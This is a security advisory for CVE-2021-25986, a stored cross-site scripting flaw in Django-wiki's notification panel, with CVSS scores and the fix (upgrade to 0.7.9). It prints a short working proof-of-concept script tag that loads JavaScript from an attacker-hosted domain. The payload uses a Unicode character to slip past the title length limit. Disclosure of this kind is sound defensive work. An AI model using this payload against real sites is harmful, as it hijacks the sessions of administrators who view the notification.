icon

We found results for “

CVE-2021-25986

Date: November 23, 2021

Overview

In Django-wiki, versions 0.0.20 to 0.7.8 are vulnerable to Stored Cross-Site Scripting (XSS) in Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.

Details

Django-wiki application is vulnerable to Stored Cross-Site Scripting (XSS) in Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.

PoC Details

Login into the application as a non-admin user and select any page (test page) that has edit permissions. Now, insert the JavaScript payload (found below) into the title parameter. Login in another browser as an admin and observe the notification bar on the top. When the victim receives a notification update, the payload gets triggered and loads the external JavaScript into the application. The JavaScript payload used was less than 25 characters because the length of the title parameter will be truncated if it is more than 25 as written in code. And also, a unicode character “℡” which is considered as a single character by application but renders as three characters “TEL” by browser because of Unicode compatibility is used to create a domain name with a minimum length of 3 characters. Content of the file “a.js” hosted on the attacker's server.

PoC Code

<script src=//℡z.in/a.js>

Affected Environments

0.0.20 to 0.7.8

Prevention

Upgrade to version 0.7.9 or later

Language: Python

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version wiki - 0.7.9

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: